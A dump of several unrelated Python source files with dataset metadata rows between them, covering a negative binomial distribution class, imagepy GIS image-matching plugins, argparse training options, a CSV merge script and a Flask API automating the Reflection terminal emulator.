"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(nbinom_logpdf(self.r, self.p, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return nbinom_cdf(self.r, self.p, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return nbinom_ccdf(self.r, self.p, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return nbinom_logcdf(self.r, self.p, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return nbinom_logccdf(self.r, self.p, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return nbinom_invcdf(self.r, self.p, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return nbinom_invccdf(self.r, self.p, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return nbinom_invlogcdf(self.r, self.p, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return nbinom_invlogccdf(self.r, self.p, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = nbinom_rand(self.r, self.p)
return out
| 24.425639
| 339
| 0.578874
| 14,440
| 107,082
| 4.219806
| 0.025416
| 0.0332
| 0.054403
| 0.080349
| 0.870335
| 0.82504
| 0.776315
| 0.745249
| 0.679916
| 0.599632
| 0
| 0.012593
| 0.2577
| 107,082
| 4,384
| 340
| 24.425639
| 0.753998
| 0.246717
| 0
| 0.568192
| 0
| 0
| 0.024007
| 0.000893
| 0
| 0
| 0
| 0
| 0
| 1
| 0.335186
| false
| 0
| 0.004275
| 0.109021
| 0.681915
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1b22a2694b26c811ca8c907c6331200c0c827d80
| 151
|
py
|
Python
|
src/Python.Flask/Python.Flask.Vue.Vuetify2/ServerApp/Controllers/__init__.py
|
grbd/GBD.NetCore.WebTemplates
|
19dee03ecc98279c10999fe6c32c61e17357d4c9
|
[
"MIT"
] | null | null | null |
src/Python.Flask/Python.Flask.Vue.Vuetify2/ServerApp/Controllers/__init__.py
|
grbd/GBD.NetCore.WebTemplates
|
19dee03ecc98279c10999fe6c32c61e17357d4c9
|
[
"MIT"
] | null | null | null |
src/Python.Flask/Python.Flask.Vue.Vuetify2/ServerApp/Controllers/__init__.py
|
grbd/GBD.NetCore.WebTemplates
|
19dee03ecc98279c10999fe6c32c61e17357d4c9
|
[
"MIT"
] | null | null | null |
import ServerApp.Controllers.HomeController
import ServerApp.Controllers.SampleDataController
# TODO
#import ServerApp.Controllers.WeatherController
| 21.571429
| 49
| 0.880795
| 13
| 151
| 10.230769
| 0.538462
| 0.338346
| 0.586466
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066225
| 151
| 6
| 50
| 25.166667
| 0.943262
| 0.331126
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
1b49920e54edbbfec6c02f64baa88be6d173b015
| 9,150
|
py
|
Python
|
menus/GIS/Match/match_plgs.py
|
Image-Py/gistool
|
064ebc5d1b0532903b13c5c207a4fac1ad29786c
|
[
"BSD-3-Clause"
] | 1
|
2019-06-13T17:02:14.000Z
|
2019-06-13T17:02:14.000Z
|
menus/GIS/Match/match_plgs.py
|
Image-Py/gistool
|
064ebc5d1b0532903b13c5c207a4fac1ad29786c
|
[
"BSD-3-Clause"
] | null | null | null |
menus/GIS/Match/match_plgs.py
|
Image-Py/gistool
|
064ebc5d1b0532903b13c5c207a4fac1ad29786c
|
[
"BSD-3-Clause"
] | 2
|
2019-06-04T09:26:31.000Z
|
2019-08-09T02:37:54.000Z
|
from imagepy import IPy
from imagepy.core.engine import Free, Simple, Table
from imagepy.core.manager import ImageManager, TableManager
import os.path as osp
import geonumpy.match as gmt
import geonumpy.util as gutil
import geonumpy as gnp
from glob import glob
class BuildIdx(Free):
title = 'Build Bound Index'
para = {'path':''}
filt = ['HDF', 'TIF', 'TIFF']
def show(self):
filt = '|'.join(['%s files (*.%s)|*.%s'%(i.upper(),i,i) for i in self.filt])
return IPy.getpath('Build idx', filt, 'open', self.para)
#process
def run(self, para = None):
p, f = osp.split(para['path'])
name, ext = osp.splitext(f)
s = p+'/*'+ext
gdf = gmt.build_index(glob(s))
IPy.show_table(gdf, '%s-idx'%name)
class MakePaper(Table):
title = 'Make Bound Image'
note = ['snap', 'row_msk']
para = {'type':'uint8', 'chan':1, 'width':1024, 'height':768, 'scale':0, 'mar':0}
view = [(int, 'width', (100, 20480), 0, 'width', 'pix'),
(int, 'height', (100, 20480), 0, 'height', 'pix'),
(float, 'scale', (0, 1000), 2, 'scale', 'unit'),
(float, 'mar', (0, 0.25), 2, 'margin', 'ratio'),
(int, 'chan', (1, 1024), 0, 'channels', 'n'),
(list, 'type', ['uint8', 'int16', 'int32', 'float32'], str, 'data', 'type')]
def run(self, tps, snap, data, para=None):
box = gutil.shp2box(snap, para['scale'] or (para['width'], para['height']), para['mar'])
IPy.show_img([gnp.frombox(*box, para['chan'], dtype=para['type'])], tps.title+'-boximg')
class MatchImgDes(Simple):
title = 'Match Img To Des'
note = ['all']
para = {'temp':None, 'step':10, 'order':'nearest', 'chans':[]}
view = [('img', 'temp', 'temp', ''),
(int, 'step', (1,100), 0, 'step', ''),
(list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
()]
def load(self, ips):
chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
self.view[-1] = ('chos', 'chans', chans, 'Channels')
return True
#process
def run(self, ips, imgs, para = None):
ipst = ImageManager.get(para['temp'])
chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
chans = [chans.index(i) for i in para['chans']]
order = {'nearest':0, 'linear':1}[para['order']]
rst = gmt.match_multi(imgs, ipst.img, chans, step=para['step'], order=order)
ipst.update()
class MatchImgShp(Simple):
title = 'Match Img To Shp'
note = ['all']
para = {'temp':None, 'step':10, 'order':'nearest', 'chans':[],
'width':1024, 'height':768, 'scale':0, 'mar':0}
view = [('tab', 'temp', 'temp', ''),
(int, 'width', (100, 20480), 0, 'width', 'pix'),
(int, 'height', (100, 20480), 0, 'height', 'pix'),
(float, 'scale', (0, 1000), 2, 'scale', 'unit'),
(float, 'mar', (0, 0.25), 2, 'margin', 'ratio'),
(int, 'step', (1,100), 0, 'step', ''),
(list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
()]
def load(self, ips):
chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
self.view[-1] = ('chos', 'chans', chans, 'Channels')
return True
#process
def run(self, ips, imgs, para = None):
table = TableManager.get(para['temp']).get_subtab()
box = gutil.shp2box(table, para['scale'] or (para['width'], para['height']), para['mar'])
chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
chans = [chans.index(i) for i in para['chans']]
order = {'nearest':0, 'linear':1}[para['order']]
rst = gmt.match_multi(imgs, box, chans, step=para['step'], order=order)
IPy.show_img([rst], ips.title+'-merge')
class MatchImgCrs(Simple):
title = 'Match Img To Crs'
note = ['all']
para = {'step':10, 'order':'nearest', 'chans':[], 'crs':4326,
'wkt':'', 'width':1024, 'height':768, 'scale':0, 'mar':0}
view = [(int, 'crs', (1000,9999), 0, 'crs', 'epsg'),
('path', 'wkt', 'prj file', ['prj']),
('lab', None, '=== select a prj file will disable the epsg code ==='),
(int, 'width', (100, 20480), 0, 'width', 'pix'),
(int, 'height', (100, 20480), 0, 'height', 'pix'),
(float, 'scale', (0, 1000), 2, 'scale', 'unit'),
(int, 'step', (1,100), 0, 'step', ''),
(list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
()]
def load(self, ips):
chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
self.view[-1] = ('chos', 'chans', chans, 'Channels')
return True
#process
def run(self, ips, imgs, para = None):
prj = None
if para['wkt'] != '':
with open(para['wkt']) as f:
prj = f.read()
crs = gutil.makecrs(prj or para['crs'])
table = gmt.build_index(imgs).to_crs(crs)
box = gutil.shp2box(table, para['scale'] or (para['width'], para['height']), para['mar'])
chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
chans = [chans.index(i) for i in para['chans']]
order = {'nearest':0, 'linear':1}[para['order']]
rst = gmt.match_multi(imgs, box, chans, step=para['step'], order=order)
IPy.show_img([rst], ips.title+'-merge')
class MatchIdxDes(Table):
title = 'Match Idx To Des'
para = {'temp':None, 'step':10, 'order':'nearest', 'chans':[]}
view = [('img', 'temp', 'temp', ''),
(int, 'step', (1,100), 0, 'step', ''),
(list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
()]
def load(self, tps):
self.view[-1] = ('chos', 'chans', list(tps.data['channels'][0]), 'Channels')
return True
def run(self, tps, snap, data, para=None):
ipst = ImageManager.get(para['temp'])
chans = list(data['channels'][0])
chans = [chans.index(i) for i in para['chans']]
order = {'nearest':0, 'linear':1}[para['order']]
rst = gmt.match_idx(data, ipst.img, chans, step=para['step'], order=order)
ipst.update()
class MatchIdxShp(Table):
title = 'Match Idx To Shp'
para = {'temp':None, 'step':10, 'order':'nearest', 'chans':[],
'width':1024, 'height':768, 'scale':0, 'mar':0}
view = [('tab', 'temp', 'temp', ''),
(int, 'width', (100, 20480), 0, 'width', 'pix'),
(int, 'height', (100, 20480), 0, 'height', 'pix'),
(float, 'scale', (0, 1000), 2, 'scale', 'unit'),
(float, 'mar', (0, 0.25), 2, 'margin', 'ratio'),
(int, 'step', (1,100), 0, 'step', ''),
(list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
()]
def load(self, tps):
self.view[-1] = ('chos', 'chans', list(tps.data['channels'][0]), 'Channels')
return True
def run(self, tps, snap, data, para=None):
table = TableManager.get(para['temp']).get_subtab()
box = gutil.shp2box(table, para['scale'] or (para['width'], para['height']), para['mar'])
chans = list(data['channels'][0])
chans = [chans.index(i) for i in para['chans']]
order = {'nearest':0, 'linear':1}[para['order']]
rst = gmt.match_idx(data, box, chans, step=para['step'], order=order)
IPy.show_img([rst], tps.title+'-merge')
class MatchIdxCrs(Table):
title = 'Match Idx To Crs'
note = ['all']
para = {'step':10, 'order':'nearest', 'chans':[], 'crs':4326,
'wkt':'', 'width':1024, 'height':768, 'scale':0, 'mar':0}
view = [(int, 'crs', (1000,9999), 0, 'crs', 'epsg'),
('path', 'wkt', 'prj file', ['prj']),
('lab', None, '=== select a prj file will disable the epsg code ==='),
(int, 'width', (100, 20480), 0, 'width', 'pix'),
(int, 'height', (100, 20480), 0, 'height', 'pix'),
(float, 'scale', (0, 1000), 2, 'scale', 'unit'),
(int, 'step', (1,100), 0, 'step', ''),
(list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
()]
def load(self, tps):
self.view[-1] = ('chos', 'chans', list(tps.data['channels'][0]), 'Channels')
return True
#process
def run(self, tps, snap, data, para=None):
prj = None
if para['wkt'] != '':
with open(para['wkt']) as f:
prj = f.read()
crs = gutil.makecrs(prj or para['crs'])
table = data.to_crs(crs)
box = gutil.shp2box(table, para['scale'] or (para['width'], para['height']), para['mar'])
chans = list(data['channels'][0])
chans = [chans.index(i) for i in para['chans']]
order = {'nearest':0, 'linear':1}[para['order']]
rst = gmt.match_idx(data, box, chans, step=para['step'], order=order)
IPy.show_img([rst], tps.title+'-merge')
plgs = [BuildIdx, MakePaper, '-',
MatchImgDes, MatchImgShp, MatchImgCrs, '-',
MatchIdxDes, MatchIdxShp, MatchIdxCrs]
| 41.402715
| 97
| 0.512131
| 1,156
| 9,150
| 4.032007
| 0.135813
| 0.046342
| 0.013946
| 0.019524
| 0.811414
| 0.785883
| 0.785883
| 0.784381
| 0.762068
| 0.75413
| 0
| 0.043266
| 0.262404
| 9,150
| 221
| 98
| 41.402715
| 0.647355
| 0.003825
| 0
| 0.730769
| 0
| 0
| 0.191746
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.082418
| false
| 0
| 0.043956
| 0
| 0.368132
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b5b6bc510027b5e3b5a07a4f210ff9a1a3d78cf
| 4,244
|
py
|
Python
|
hw2/utils.py
|
haem-k/gct634-ai613-2021
|
04f2dc26d38b56e229a1dc7849b25b84941bbcea
|
[
"MIT"
] | null | null | null |
hw2/utils.py
|
haem-k/gct634-ai613-2021
|
04f2dc26d38b56e229a1dc7849b25b84941bbcea
|
[
"MIT"
] | null | null | null |
hw2/utils.py
|
haem-k/gct634-ai613-2021
|
04f2dc26d38b56e229a1dc7849b25b84941bbcea
|
[
"MIT"
] | null | null | null |
import argparse
'''
Parser utils
'''
def train_multilabel():
parser = argparse.ArgumentParser(description="Training model for multi-label classification")
parser.add_argument('--model', type=str, default='baseline', choices=['baseline', 'cnn2d', 'cnn2ddeep', 'cnntf', 'cnntfdeep', 'cnntf2'], help='model architecture')
parser.add_argument('--writer', type=str, default='', help='postfix for tensorboard file')
parser.add_argument('--batch_size', type=int, default=16, help='batch size')
parser.add_argument('--num_workers', type=int, default=2, help='number of workers')
parser.add_argument('--sample_rate', type=int, default=16000, help='sampling rate for audio data')
parser.add_argument('--duration', type=int, default=3, help='duration of each chunk')
parser.add_argument('--optimizer', type=str, default='sgd', choices=['adam', 'sgd'], help='optimizer')
parser.add_argument('--num_epochs', type=int, default=10, help='number of training epoch')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--sr', type=float, default=1e-5, help='stopping rate')
parser.add_argument('--momentum', type=float, default=0.9, help='momentum for sgd')
parser.add_argument('--weight_decay', type=float, default=0.0, help='weight decay - L2 regularization weight')
return parser.parse_args()
def train_metric():
parser = argparse.ArgumentParser(description="Training model for metric learning")
parser.add_argument('--model', type=str, default='linear', choices=['linear', 'conv1d', 'conv2d', 'tf', 'tfdeep', 'tf2'], help='model architecture')
parser.add_argument('--writer', type=str, default='', help='postfix for tensorboard file')
parser.add_argument('--batch_size', type=int, default=16, help='batch size')
parser.add_argument('--num_workers', type=int, default=2, help='number of workers')
parser.add_argument('--sample_rate', type=int, default=16000, help='sampling rate for audio data')
parser.add_argument('--duration', type=int, default=3, help='duration of each chunk')
parser.add_argument('--optimizer', type=str, default='sgd', choices=['adam', 'sgd'], help='optimizer')
parser.add_argument('--num_epochs', type=int, default=3, help='number of training epoch')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--sr', type=float, default=1e-5, help='stopping rate')
parser.add_argument('--momentum', type=float, default=0.9, help='momentum for sgd')
parser.add_argument('--weight_decay', type=float, default=0.0, help='weight decay - L2 regularization weight')
return parser.parse_args()
| 94.311111
| 203
| 0.450754
| 363
| 4,244
| 5.165289
| 0.225895
| 0.1152
| 0.2176
| 0.042667
| 0.895467
| 0.894933
| 0.894933
| 0.797867
| 0.797867
| 0.797867
| 0
| 0.018844
| 0.437323
| 4,244
| 45
| 204
| 94.311111
| 0.766332
| 0
| 0
| 0.709677
| 0
| 0
| 0.211598
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.032258
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1b71e8a05bf65aab7f152eab09a5951712a28df3
| 3,142
|
py
|
Python
|
merge.py
|
priyagurjar/signal-processing
|
bae7f0830c0e6a7feedbc25774d048fb62059425
|
[
"Apache-2.0"
] | null | null | null |
merge.py
|
priyagurjar/signal-processing
|
bae7f0830c0e6a7feedbc25774d048fb62059425
|
[
"Apache-2.0"
] | null | null | null |
merge.py
|
priyagurjar/signal-processing
|
bae7f0830c0e6a7feedbc25774d048fb62059425
|
[
"Apache-2.0"
] | null | null | null |
import pandas, sys
import pandas as pd
a = pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/kushagra_lie_R.csv")
b = pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/kushagra_truth_R.csv")
c=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/komal_lie_R.csv")
d=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/komal_truth_R.csv")
e=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/nirma_lie_R.csv")
f=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/nirma_truth_R.csv")
g=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/nisha_lie_R.csv")
h=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/nisha_truth_R.csv")
i=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/himani_lie_R.csv")
j=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/himani_truth_R.csv")
k=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/jayti_lie_R.csv")
l=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/jayti_truth_R.csv")
m=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/disha_lie_R.csv")
n=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/disha_truth_R.csv")
o=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/kaajal_lie_R.csv")
p=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/kaajal_truth_R.csv")
q=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/malvika_lie_R.csv")
r=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/malvika_truth_R.csv")
s=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/rakhi_lie_R.csv")
t=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/rakhi_truth_R.csv")
u=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/shubhi_lie_R.csv")
v=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/shubhi_truth_R.csv")
w=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/arpit_lie_R.csv")
x=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/arpit_truth_R.csv")
y=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/nobha_lie_R.csv")
z=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/nobha_truth_R.csv")
ab=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/priya_lie_R.csv")
cd=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/priya_truth_R.csv")
ef=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/risana_lie_R.csv")
gh=pd.read_csv("/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/risana_truth_R.csv")
merged = pd.concat([a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,ab,cd,ef,gh])
merged.to_csv('/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts/result_final.csv', index=False)
| 84.918919
| 108
| 0.80522
| 567
| 3,142
| 4.24515
| 0.121693
| 0.090154
| 0.167428
| 0.28334
| 0.84005
| 0.84005
| 0.84005
| 0.84005
| 0.84005
| 0.84005
| 0
| 0.010019
| 0.015277
| 3,142
| 37
| 108
| 84.918919
| 0.767938
| 0
| 0
| 0
| 0
| 0
| 0.775056
| 0.775056
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1b7bd4337c4a0baf68664105d887d42e6fea291b
| 10,645
|
py
|
Python
|
src/py_reflection/views.py
|
prasun1060/py_reflection
|
fde5e432c0ea44b8a250348330aa8f959e176a70
|
[
"BSD-4-Clause"
] | 2
|
2021-08-08T17:41:20.000Z
|
2022-02-01T20:39:39.000Z
|
src/py_reflection/views.py
|
prasun1060/py_reflection
|
fde5e432c0ea44b8a250348330aa8f959e176a70
|
[
"BSD-4-Clause"
] | null | null | null |
src/py_reflection/views.py
|
prasun1060/py_reflection
|
fde5e432c0ea44b8a250348330aa8f959e176a70
|
[
"BSD-4-Clause"
] | null | null | null |
from . import app, CONTROL_KEYS
import win32com.client as wc
from pywinauto.application import Application as pw
from flask import jsonify, request
def connect_refection(view_idx: int = 1) -> object:
try:
wgs = wc.GetObject('Reflection Workspace')
wgs_screen = wgs.GetObject('Frame').view(view_idx).Control.Screen
except:
print('Unexpected error occured!, Please check if reflection desktop is open.')
else:
return wgs_screen
@app.route('/connect')
def connect():
import time
while True:
try:
print('Connecting to Reflection Workspace Desktop')
app = pw(backend='win32').connect(title_re='.*Reflection*', found_index=0)
dlg = app.window()[0]
dlg.set_focus()
except:
print('Unable to connect to Reflection Workspace Desktop. retrying...')
time.sleep(0.1)
else:
return jsonify({
'response': 'Reflection Workspace successfully connected.',
'error': False
})
@app.route('/send_keys', methods=['GET', 'POST'])
def send_keys():
view_idx = request.args.get('view_idx')
if view_idx is None:
view_idx = 1
else:
view_idx = int(view_idx)
reflection_obj = connect_refection(view_idx=view_idx)
if reflection_obj is None:
return jsonify({
'response': 'Unexpected error occured; Please check if refection desktop is open.',
'error': True
})
text = request.args.get('text')
if text is None:
return jsonify({
'response': 'Unexpected error occured; Text input cannot be None.',
'error': True
})
try:
x = int(request.args.get('x'))
y = int(request.args.get('y'))
except:
return jsonify({
'response': 'Unexpected error occured; Values of x and y should be numeric.',
'error': True
})
else:
try:
reflection_obj.PutText2(text, x, y)
except:
print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
return jsonify({
'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
'error': True
})
else:
return jsonify({
'response': 'Success',
'error': False
})
@app.route('/press_enter', methods=['GET', 'POST'])
def press_enter():
view_idx = request.args.get('view_idx')
if view_idx is None:
view_idx = 1
else:
view_idx = int(view_idx)
reflection_obj = connect_refection(view_idx=view_idx)
if reflection_obj is None:
return jsonify({
'response': 'Unexpected error occured; Please check if refection desktop is open.',
'error': True
})
try:
reflection_obj.SendControlKey(1)
except:
print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
return jsonify({
'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
'error': True
})
else:
return jsonify({
'response': 'Enter pressed successfully',
'error': False
})
@app.route('/press_key', methods=['GET', 'POST'])
def press_key():
view_idx = request.args.get('view_idx')
if view_idx is None:
view_idx = 1
else:
view_idx = int(view_idx)
reflection_obj = connect_refection(view_idx=view_idx)
if reflection_obj is None:
return jsonify({
'response': 'Unexpected error occured; Please check if refection desktop is open.',
'error': True
})
control_key = request.args.get('control_key')
try:
reflection_obj.SendControlKey(CONTROL_KEYS[control_key])
except:
print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
return jsonify({
'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
'error': True
})
else:
return jsonify({
'response': 'Key pressed successfully',
'error': False
})
@app.route('/press_control_keys', methods=['GET', 'POST'])
def press_control_keys():
view_idx = request.args.get('view_idx')
if view_idx is None:
view_idx = 1
else:
view_idx = int(view_idx)
reflection_obj = connect_refection(view_idx=view_idx)
if reflection_obj is None:
return jsonify({
'response': 'Unexpected error occured; Please check if refection desktop is open.',
'error': True
})
control_key = int(request.args.get('control_key'))
try:
reflection_obj.SendControlKey(control_key)
except:
print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
return jsonify({
'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
'error': True
})
else:
return jsonify({
'response': 'Key pressed successfully',
'error': False
})
@app.route('/get_text', methods=['GET', 'POST'])
def get_text():
view_idx = request.args.get('view_idx')
if view_idx is None:
view_idx = 1
else:
view_idx = int(view_idx)
reflection_obj = connect_refection(view_idx=view_idx)
if reflection_obj is None:
return jsonify({
'response': 'Unexpected error occured; Please check if refection desktop is open.',
'error': True
})
try:
x = int(request.args.get('x'))
y = int(request.args.get('y'))
length = int(request.args.get('length'))
except:
return jsonify({
'response': 'Unexpected error occured; Values of x and y should be numeric.',
'error': True
})
else:
try:
output = reflection_obj.GetText(x, y, length)
except:
print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
return jsonify({
'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
'error': True
})
else:
return jsonify({
'response': output,
'error': False
})
@app.route('/get_text_coordinates', methods=['GET', 'POST'])
def get_text_coordinates():
view_idx = request.args.get('view_idx')
if view_idx is None:
view_idx = 1
else:
view_idx = int(view_idx)
reflection_obj = connect_refection(view_idx=view_idx)
if reflection_obj is None:
return jsonify({
'response': 'Unexpected error occured; Please check if refection desktop is open.',
'error': True
})
text = request.args.get('text')
total_row_count = int(request.args.get('total_row_count'))
total_column_count = int(request.args.get('total_column_count'))
if total_row_count is None or total_column_count is None:
total_row_count = 24
total_column_count = 80
for row_no in range(1, total_row_count + 1):
line = reflection_obj.GetText(row_no, 1, total_column_count)
if line.find(text) != -1:
return jsonify({
'error': False,
'response': {'x': row_no, 'y': line.find(text) + 1}
})
return jsonify({
'error': False,
'response': {'x': 0, 'y': 0}
})
@app.route('/check_text_present', methods=['GET', 'POST'])
def check_text_present():
view_idx = request.args.get('view_idx')
if view_idx is None:
view_idx = 1
else:
view_idx = int(view_idx)
reflection_obj = connect_refection(view_idx=view_idx)
if reflection_obj is None:
return jsonify({
'response': 'Unexpected error occured; Please check if refection desktop is open.',
'error': True
})
text = request.args.get('text')
total_row_count = int(request.args.get('total_row_count'))
total_column_count = int(request.args.get('total_column_count'))
if total_row_count is None or total_column_count is None:
total_row_count = 24
total_column_count = 80
for row_no in range(1, total_row_count + 1):
line = reflection_obj.GetText(row_no, 1, total_column_count)
if line.find(text) != -1:
return jsonify({
'error': False,
'response': True
})
return jsonify({
'error': False,
'response': False
})
@app.route('/move_cursor', methods=['GET', 'POST'])
def move_cursor():
view_idx = request.args.get('view_idx')
if view_idx is None:
view_idx = 1
else:
view_idx = int(view_idx)
reflection_obj = connect_refection(view_idx=view_idx)
if reflection_obj is None:
return jsonify({
'response': 'Unexpected error occured; Please check if refection desktop is open.',
'error': True
})
try:
x = int(request.args.get('x'))
y = int(request.args.get('y'))
except:
return jsonify({
'response': 'Unexpected error occured; Values of x and y should be numeric.',
'error': True
})
else:
try:
output = reflection_obj.MoveCursorTo1(x, y)
except:
print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
return jsonify({
'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
'error': True
})
else:
return jsonify({
'response': 'Cursor moved successfully.',
'error': False
})
@app.route('/get_view_count', methods=['GET', 'POST'])
def get_view_count():
try:
wgs = wc.GetObject('Reflection Workspace')
output = wgs.GetObject('Frame').viewCount
except:
print('Unexpected error occured!, Please check if reflection desktop is open.')
return jsonify({
'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
'error': True
})
else:
return jsonify({
'response': output,
'error': False
})
| 33.265625
| 111
| 0.585815
| 1,244
| 10,645
| 4.865756
| 0.095659
| 0.076326
| 0.098133
| 0.106394
| 0.843714
| 0.816455
| 0.787543
| 0.779779
| 0.771683
| 0.771683
| 0
| 0.005272
| 0.30512
| 10,645
| 319
| 112
| 33.369906
| 0.813032
| 0
| 0
| 0.814815
| 0
| 0
| 0.288586
| 0.001973
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.016835
| 0
| 0.161616
| 0.03367
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b80f40c3a1a896b776c3a385b528082d5d91b3a
| 2,994
|
py
|
Python
|
tests/test_hooks.py
|
j19sch/pytest-logfest
|
02fefdd8b9b1d1663a473300e51e9045d1a2b811
|
[
"MIT"
] | null | null | null |
tests/test_hooks.py
|
j19sch/pytest-logfest
|
02fefdd8b9b1d1663a473300e51e9045d1a2b811
|
[
"MIT"
] | null | null | null |
tests/test_hooks.py
